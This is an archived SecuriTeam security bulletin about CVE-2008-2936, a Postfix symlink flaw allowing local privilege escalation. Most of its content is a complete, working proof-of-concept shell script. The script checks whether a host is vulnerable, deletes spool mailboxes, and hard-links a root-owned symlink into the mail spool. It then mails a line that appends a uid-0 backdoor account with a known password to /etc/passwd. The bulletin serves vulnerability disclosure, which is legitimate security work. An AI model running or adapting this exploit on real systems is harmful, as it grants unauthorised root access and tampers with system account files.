[EXPL] Postfix symlink Local Privilege Escalation (Exploit)



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Postfix symlink Local Privilege Escalation (Exploit)
------------------------------------------------------------------------


SUMMARY

Postfix before 2.3.15, 2.4 before 2.4.8, 2.5 before 2.5.4, and 2.6 before
2.6-20080814, when the operating system supports hard links to symlinks,
allows local users to append e-mail messages to a file to which a
root-owned symlink points, by creating a hard link to this symlink and
then sending a message. NOTE: this can be leveraged to gain privileges if
there is a symlink to an init script.

DETAILS

CVE Information:
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2936>
CVE-2008-2936

Exploit:
#!/bin/sh
#
# "rs_pocfix.sh" (PoC for Postfix local root vulnerability: CVE-2008-2936)
# by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt <roman@xxxxxxxxxxx>
#
# Tested: Ubuntu / Debian
#
# [ Madrid, 30.Aug.2008 ]
#

# Config

writable_dir=/tmp
spool_dir=/var/mail # Use "postconf mail_spool_directory" to obtain this
user=root
target=/etc/passwd
useful_link=/usr/bin/atq # lrwxrwxrwx 2 root root 2 2007-05-04 22:15
/usr/bin/atq -> at
useful_link_dst=at # Tip: find / -type l -uid 0 -print -exec ls -l {} \;
| less
seconds=3
user_in_passwd="dsr:3GsXLdEaKaGnM:0:0:root:/root:/bin/sh" # Pass is
"dsrrocks"
postfix=`which postfix` # /usr/sbin/postfix
postconf=/usr/sbin/postconf
postmap=/usr/sbin/postmap


# Funcs

quit()
{
echo "$1"
exit
}


# Step 1: is my system vulnerable?

head -n 9 $0 | tail -n 8
if [ $postfix ] ; then
echo "[*] Postfix seems to be installed"
else
quit "[!] Are you sure Postfix is installed?"
fi

mkdir -p $writable_dir/pocfix
touch $writable_dir/pocfix/src
ln -s $writable_dir/pocfix/src $writable_dir/pocfix/dst1
ln $writable_dir/pocfix/dst1 $writable_dir/pocfix/dst2

if [ -L $writable_dir/pocfix/dst2 ] ; then
echo "[*] Hardlink to symlink not dereferenced"
rm -rf $writable_dir/pocfix
else
rm -rf $writable_dir/pocfix
quit "[!] Hardlink to symlink correctly dereferenced. System is not
vulnerable"
fi

if [ -d $spool_dir -a -w $spool_dir ] ; then
echo "[*] Spool dir is writable"
else
quit "[!] Spool dir is not writable"
fi

if [ -e $spool_dir/$user ] ; then
rm -f $spool_dir/$user
echo "[*] Mailbox for \"$user\" found. Trying to delete it"

if [ -e $spool_dir/$user ] ; then
quit "[!] Couldn't delete it"
else
echo "[*] Deletion ok"
fi

fi

if [ -e $spool_dir/$useful_link_dst ] ; then
rm -f $spool_dir/$useful_link_dst
echo "[*] Mailbox for \"$useful_link_dst\" found. Trying to delete it"

if [ -e $spool_dir/$useful_link_dst ] ; then
quit "[!] Couldn't delete it"
else
echo "[*] Deletion ok"
fi

fi

aliases=`$postconf alias_database | cut -d"=" -f2`
$postconf alias_maps | grep -q $aliases
if [ $? -eq 0 ] ; then
if [ $aliases ] ; then
$postmap -q $user $aliases > /dev/null
if [ $? -eq 0 ] ; then
quit "[!] Mail alias for \"$user\" exists"
fi
fi
fi

lda=`$postconf mailbox_command | cut -d"=" -f2`
if [ $lda ] ; then
quit "[!] Non-Postfix LDA detected"
fi

$postconf home_mailbox | grep -q '/$'
if [ $? -eq 0 ] ; then
quit "[!] Maildir-style mailbox detected"
fi


# Step 2: Exploiting

ln -f $useful_link $spool_dir/$user 2> /dev/null || quit "[!] Couldn't
create hardlink (different partitions?)"
ln -s -f $target $spool_dir/$useful_link_dst 2> /dev/null || quit "[!]
Couldn't create symlink pointing to target file"
cp -f $target $writable_dir/pocfix_target_backup.$$ && echo "[*] Backed
up: $target (saved as \"$writable_dir/pocfix_target_backup.$$\")"
echo "[*] Sending mail ($seconds seconds wait)"
echo $user_in_passwd | /usr/sbin/sendmail $user

sleep $seconds

diff -q $target $writable_dir/pocfix_target_backup.$$ > /dev/null

if [ $? -eq 0 ] ; then
echo "[!] Exploit failed"
else
echo "[*] Exploit successful (appended data to $target). Now \"su dsr\",
pass is \"dsrrocks\")"
fi

rm -f $spool_dir/$user
rm -f $spool_dir/$useful_link_dst

# milw0rm.com [2008-08-31]


ADDITIONAL INFORMATION

The information has been provided by <mailto:roman@xxxxxxxxxxx> Roman
Medina-Heigl Hernandez.
The original article can be found at:
<http://www.milw0rm.com/exploits/6337>
http://www.milw0rm.com/exploits/6337



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • [UNIX] PHP open_basedir Race Condition Vulnerability
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... PHP open_basedir Race Condition Vulnerability ... PHP's symlink() function in a very easy way. ...
    (Securiteam)
  • [EXPL] phpBB Remote PHP Code Execution (viewtopic.php 2)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The following exploit code utilizes a vulnerability in phpBB to cause ... This bulletin is sent to members of the SecuriTeam mailing list. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [EXPL] TinyWeb Server DoS Exploit
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [EXPL] 3Com FTP Server Buffer Overflow (CD)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... overflow in its parsing of the 'CD' command. ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [TOOL] Automagic SQL Injector
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The Automagic SQL Injector is part of the Sec-1 Exploit Arsenal provided ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)